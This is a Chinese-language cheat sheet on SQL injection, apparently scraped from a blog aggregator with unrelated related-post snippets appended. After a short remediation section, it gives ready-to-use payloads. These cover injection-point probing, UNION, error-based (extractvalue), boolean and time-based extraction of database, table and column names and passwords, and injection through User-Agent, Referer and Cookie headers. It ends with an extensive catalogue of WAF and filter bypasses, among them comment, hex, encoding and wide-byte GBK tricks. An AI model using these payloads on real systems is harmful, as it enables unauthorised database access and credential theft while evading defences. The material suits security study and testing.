2. 程式人生 > >SQL註入漏洞總結

SQL註入漏洞總結

阿新 發佈:2019-01-26
php 自己 用戶 5.7 定義 註意 3.2 cap url

目錄:

一、SQL註入漏洞介紹

二、修復建議

三、通用姿勢

四、具體實例

五、各種繞過

一、SQL註入漏洞介紹:

SQL註入攻擊包括通過輸入數據從客戶端插入或“註入”SQL查詢到應用程序。一個成功的SQL註入攻擊可以從數據庫中獲取敏感數據、修改數據庫數據(插入/更新/刪除)、執行數據庫管理操作(如關閉數據庫管理系統)、恢復存在於數據庫文件系統中的指定文件內容,在某些情況下能對操作系統發布命令。SQL註入攻擊是一種註入攻擊。它將SQL命令註入到數據層輸入,從而影響執行預定義的SQL命令。由於用戶的輸入,也是SQL語句的一部分,所以攻擊者可以利用這部分可以控制的內容,註入自己定義的語句,改變SQL語句執行邏輯,讓數據庫執行任意自己需要的指令。通過控制部分SQL語句,攻擊者可以查詢數據庫中任何自己需要的數據,利用數據庫的一些特性,可以直接獲取數據庫服務器的系統權限。

二、修復建議

    1. 使用參數化查詢接口或在代碼級對帶入SQL語句中的外部參數進行轉義或過濾;
    2. 對於整數,判斷變量是否符合[0-9]的值;其他限定值,也可以進行合法性校驗;
    3. 對於字符串,對SQL語句特殊字符進行轉義(單引號轉成兩個單引號,雙引號轉成兩個雙引號)。

三、通用姿勢

3.1 通過以下操作先大概判斷是否存在註入點

  1. 如果參數(id)是數字,測試id=2-1與id=1返回的結果是否相同,如果做了2-1=1的運算,說明可能存在數字型註入。如果要用+號運算的話,因為URL編碼的問題,需要把加好換成%2B,如id=1%2B1
  2. 在參數後面加單引號或雙引號,判斷返回結果是否有報錯
  3. 添加註釋符,判斷前後是否有報錯,如id=1‘ --+ 或 id=1" --+ 或id=1‘ # 或id=1" --+ (--後面跟+號,是把+當成空格使用)
  4. 有些參數可能在括號裏面,如:SELECT first_name, last_name FROM users WHERE user_id = (‘$id‘);所以也可以在參數後面加單雙引號和括號,如id=1‘) --+ 或 id=1") --+ 或id=1‘) # 或id=1") --+
  5. 參數後面跟or 或者and,判斷返回結果是否有變化,如1‘ or ‘a‘=‘a 或者and ‘a‘=‘a或者1‘ or ‘a‘=‘b或者1‘ or ‘1‘=‘2
  6. 如果返回的正確頁面與錯誤頁面都一樣,可以考慮時間延遲的方法判斷是否存在註入,如 1’ and sleep(5)

3.2 如果存在註入,利用註入獲取信息

3.2.1 查詢結果如果可以直接返回

利用聯合查詢一步步的獲取信息,如:

//獲取數據庫名稱,註意聯合查詢要求前後查詢的列數和數據類型必須對應
1‘ union select schema_name from information_schema.schemata --
//根據上一步獲取的數據庫名稱,獲取表名
1‘ union select table_name from information_schema.tables where table_schema=‘database_name‘
//根據上面的數據庫名稱和表名獲取字段名
1‘ union select column_name from information_schema.columns where table_schema=‘database_name‘ and table_name=‘table_name‘
//獲取字段值,使用group_concat的目的是把查詢結果合並成1列,另外,如果跨數據庫查詢值得花,需要使用數據庫名.表明的格式,比如
information_schema.schemata<br>1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 數據庫名.表名

3.2.2 通過報錯回顯查詢結果,如:

#利用報錯回顯查詢到的值,回顯當前的數據庫名
and extractvalue(1,concat(0x7e,(select database())))
#回顯表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘ )))
#回顯列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘)))

3.2.3 布爾型註入,如:

#判斷數據庫名的長度是多少
SELECT * FROM users where id =‘1‘ and LENGTH(database())=8   
# 二分查找發挨個判斷數據庫名稱的每個字母
SELECT * FROM users where id =‘1‘ and ascii(substr((select database()),1,1))>115  
#挨個判斷此數據庫中表的每個字母
SELECT * FROM users where id =‘1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),1,1))>116

3.2.4 時間延遲註入,如:

and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))

四、具體實例

4.1字符型(參數在單引號內,直接返回結果)

‘
‘‘
"
""
‘"
"‘
‘)
‘‘)
各種組合

4.2 數字型(直接返回結果)

無需引號閉合,id後面直接跟聯合索引就行了

4.3 user-agent類型的註入

user-agent的值被原封返回了

技術分享圖片

需要借助源碼審計了,否則不容易猜到真實的sql語句。

如下源碼所示,SQL語句是三個字段的insert語句,然後$uagent被返回。

技術分享圖片

結合報錯註入構造payload

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0‘, extractvalue(1,concat(0x7e,(select database()))),‘1‘) #

4.4 Referer類型的註入

Referer: http://127.0.0.1/sql/Less-19/‘,extractvalue(1,concat(0x7e,(select database()))))#

4.5 Cookie類型的註入

輸入單引號報錯,確認屬於cookie類型的註入,而且報錯回顯了,利用報錯回顯數據技術分享圖片

構造payload

Cookie: uname=admin‘ and extractvalue(1,concat(0x7e,(select database()))) #

五、各種繞過

5.1 繞過空格

其他空白符

%20 %09 %0a %0b %0c %0d %a0 %00  

註釋符

/**/  /*!*/ 
select/**/schemm_name/**/from/**/information_schema.schemata;

浮點數

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0 select 1,2,3

括號

在MySQL中,括號是用來包圍子查詢的。因此,任何可以計算出結果的語句,都可以用括號包圍起來。而括號的兩端,可以沒有多余的空格。例如:

select(user())from dual where(1=1)and(2=2)

  這種過濾方法常常用於time based盲註,例如:

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23  

(from for屬於逗號繞過下面會有)

  上面的方法既沒有逗號也沒有空格。猜解database()第一個字符ascii碼是否為109,若是則加載延時

5.2 繞過引號(使用十六進制)

會使用到引號的地方一般是在最後的where子句中。如下面的一條sql語句,這條語句就是一個簡單的用來查選得到users表中所有字段的一條語句:

select column_name  from information_schema.tables where table_name="users"

  這個時候如果引號被過濾了,那麽上面的where子句就無法使用了。那麽遇到這樣的問題就要使用十六進制來處理這個問題了。
  users的十六進制的字符串是7573657273。那麽最後的sql語句就變為了:

select column_name  from information_schema.tables where table_name=0x7573657273

5.3 繞過逗號(使用from或者offset)

在使用盲註的時候,需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對於substr()和mid()這兩個方法可以使用from to的方式來解決

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

使用join

union select 1,2     #等價於
union select * from (select 1)a join (select 2)b

  使用like

select ascii(mid(user(),1,1))=80   #等價於
select user() like ‘r%‘

  對於limit可以使用offset來繞過

select * from news limit 0,1       # 等價於
select * from news limit 1 offset 0  

5.4 繞過比較符號"<>"(sqlmap盲註經常需要用到"<>",使用greatest()/least函數,或者between的腳本)

使用greatest() / least():(前者返回最大值,後者返回最小值)

select * from users where id=1 and ascii(substr(database(),0,1))>64   #等價於
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and

between a and b:返回a,b之間的數據,不包含b

5.5 繞過 or and xor not  

and=&&  or=||   xor=|   not=!  

5.6 繞過註釋符號(#,--(後面跟一個空格))

id=1‘ union select 1,2,3||‘1

  最後的or ‘1閉合查詢語句的最後的單引號,或者

id=1‘ union select 1,2,‘3

5.7 繞過等號"="

使用like 、rlike 、regexp 或者 使用< 或者 >

5.8 繞過union,select,where等

註釋符

常用註釋符
//,-- , /**/, #, --+, -- -, ;,%00,--a
用法
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

大小寫

內聯註釋

id=-1‘/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#  

雙關鍵字

id=-1‘UNIunionONSeLselectECT1,2,3–-  

通用繞過(編碼)

如URLEncode編碼,ASCII,HEX,unicode編碼繞過

or 1=1 即
%6f%72%20%31%3d%31
而"Test"也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

等價函數

hex()、bin()  ==>  ascii()
sleep()       ==>  benchmark()
concat_ws()  ==>  group_concat()
mid()、substr()  ==> substring()
@@user     ==>   user()
@@datadir   ==>   datadir()
舉例:substring()和substr()無法使用時:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 
或者:
substr((select ‘password‘),1,1) = 0x70
strcmp(left(‘password‘,1), 0x69) = 1
strcmp(left(‘password‘,1), 0x70) = 0
strcmp(left(‘password‘,1), 0x71) = -1  

5.9 繞過寬字節

過濾 ‘ 的時候往往利用的思路是將 ‘ 轉換為 \‘ 。

  在 mysql 中使用 GBK 編碼的時候,會認為兩個字符為一個漢字,一般有兩種思路:

  (1)%df 吃掉 \ 具體的方法是 urlencode(‘\) = %5c%27,我們在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 編碼方式的時候會將兩個字節當做一個漢字,%df%5c 就是一個漢字,%27 作為一個單獨的(‘)符號在外面

id=-1%df%27union select 1,user(),3--+

  (2)將 \‘ 中的 \ 過濾掉,例如可以構造 %**%5c%5c%27 ,後面的 %5c 會被前面的 %5c 註釋掉。

一般產生寬字節註入的PHP函數

1.replace():過濾 ‘ \ ,將 ‘ 轉化為 \‘ ,將 \  轉為 \\,將 " 轉為 \" 。用思路一。
2.addslaches():返回在預定義字符之前添加反斜杠(\)的字符串。預定義字符:‘ , " , \ 。用思路一
(防禦??將mysql_query 設置為 binary 的方式)
3.mysql_real_escape_string():轉義下列字符:
\x00 \n \r \ ‘ " \x1a
(防禦??將mysql設置為gbk即可)

SQL註入漏洞總結

相關推薦

SQL漏洞總結

php 自己 用戶 5.7 定義 註意 3.2 cap url 目錄: 一、SQL註入漏洞介紹 二、修復建議 三、通用姿勢 四、具體實例 五、各種繞過 一、SQL註入漏洞介紹: SQL註入攻擊包括通過輸入數據從客戶端插入或“註入”SQL查詢到應用程序。一個成

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【安全牛學習筆記】初識sql漏洞原理

信息安全 sql security+ 網站沒有對輸入的字符進行過濾,導致輸入的字符影響到網站數據的查詢。編程 數學邏輯思維 and or xor 且 或 否 或:有一個真就是真 且:有一個假就為假 否:相反怎麽找是否有註入漏洞? 第一個找符合參數鏈接的網站

三、ADO.Net基礎【05】SQL漏洞(SQLInjection)

字符串 大於 拼接 匹配 常用 ado 執行 註入漏洞 基礎 使用字符串拼接的方式把sql語句所需參數拼接到將要執行的sql語句中(參數一般只sql語句的過濾條件),對於用戶的惡意輸入可能導致不一的查詢結果 例如:一個登錄的例子(UserName和Password是用戶的輸

SQL漏洞的分析與利用(一)

ces mysql 得出 必須 排序 快速搭建 oracle 學習筆記 min SQL註入的核心思想 黑客在正常的需要調用數據庫的URL後面構造一段數據庫查詢代碼,然後根據返回的結果,從而獲得想要的某些數據。SQL結構化查詢語言,絕大多數關系型數據庫(MySQL、Acces

SQL漏洞的分析與利用(二)

manage 如果 得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境:實驗平臺:小旋風ASPWeb服務器目標網站:南方數據2.02.打開網站,隨意點開一個頁面看到?id=4說明有參數傳遞,用的是get方法,可能是一個註入點加入判

SQL漏洞的分析與利用(三)

和數 form 打開 用戶 data 用戶名 text 必須 存儲 MySQL數據庫: 元數據庫information_schema1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema,其中存儲著用戶在MySQL中創建的所有其他數據庫的信

ref:ThinkPHP Builder.php SQL漏洞(<= 3.2.3)

syntax tle AR turn sql註入 cat 類型 times execute ThinkPHP Builder.php SQL註入漏洞(<= 3.2.3) ref:https://www.jianshu.com/p/18d06277161e TimeSH

Zabbix sql漏洞腳本執行反彈shell

腳本執行 ucc shell UC 編寫 密碼 我們 zabbix 執行 exp檢測是否存在SQL註入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------

網站漏洞修復方案防止SQL×××漏洞

單引號 註入漏洞 很多 api 影響 數值 簡單 HP 存在 SQL註入漏洞在網站漏洞裏面屬於高危漏洞,排列在前三,受影響範圍較廣,像asp、.net、PHP、java、等程序語言編寫的代碼,都存在著sql註入漏洞,那麽如何檢測網站存在sql註入漏洞? SQL註入漏洞測試方

命令漏洞總結

git add 分享圖片 攻擊 .com 正文 pst scenarios 一個 前言 漏洞本身原理很簡單,用戶的輸入作為 要執行命令的一部分被 一些執行系統命令的函數去執行,如果不註意就能夠讓攻擊者執行系統命令。 正文 相關的工具 https://github.com/e

SQL學習總結(八):其他SQL的異或

href http 發現 .sql 異或 ascii 3.2 運算 證明 其他類型註入的詳解(5) 5.sql異或註入 背景當我們在嘗試SQL註入時,發現union,and被完全過濾掉了,就可以考慮使用異或註入 知識點 異或運算規則: 1^1=0 0^0=0 0^1=1 1

怎麽修復網站漏洞之metinfo遠程SQL漏洞修補

導致 腳本 mark 技術分享 -o 詳情 報告 過濾 新版本 2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是Met

discuzX3.2 X3.4網站漏洞修復 SQL漏洞修復

比較 class linux c php環境 數據 如何 127.0.0.1 由於 效果 2018年12月9日,國內某安全組織,對discuz X3.2 X3.4版本的漏洞進行了公開,這次漏洞影響範圍較大,具體漏洞是discuz 的用戶前段SQL註入與請求偽造漏洞,也俗稱×

cacti後臺SQL漏洞 --解決

templates abi agent ted 外部 eat kit Language view cacti後臺SQL註入漏洞 簡介 cacti後臺SQL註入漏洞 cacti /graphs_new.php中對$_POST["cg_g"]參數過濾不

web安全—sql漏洞

關於 style union 原理 lec 包括 視圖 16進制 如果 SQL註入-mysql註入 一.普通的mysql註入 MySQL註入不像註入access數據庫那樣,不需要猜。從mysql5.0以上的版本,出現一個虛擬的數據庫,即:information_sch

【安全牛學習筆記】手動漏洞挖掘-SQL

security+ 漏洞 信息安全 手動漏洞挖掘-----SQL註入無權讀取information_schema庫 / 拒絕union、orderby語句 猜列明: ‘and column is null--+ Burp suite自動猜列名 猜當前表表名: ‘and

記錄一次網站漏洞修復過程(三):第二輪處理(攔截SQL、跨站腳本攻擊XSS)

cat nbsp ebe 嵌入 網頁 防止 記錄 用戶輸入 light 在程序編寫的時候采用參數化的SQL語句可以有效的防止SQL註入,但是當程序一旦成型,再去修改大量的數據庫執行語句並不是太現實,對網頁表單上輸入進行校驗是易於實現的方法。在webForm 頁面中開啟校驗屬

【安全牛學習筆記】?KALI版本更新和手動漏洞挖掘(SQL

信息安全 security+ sql註入 漏洞 KALI版本更新-----第一個ROLLING RELEASEKali 2.0發布時聲稱將采用rolling release模式更新(但並未實施)Fixed-release 固定發布周期 使用軟件穩定的主流版本 發布--

SQL學習資料總結

腳本 使用 返回結果 得到 php代碼 世界 信息 其他 系統命令 轉載自:https://bbs.ichunqiu.com/thread-12105-1-1.html 什麽是SQL註入 SQL註入基本介紹 結構化查詢語言(Structured Query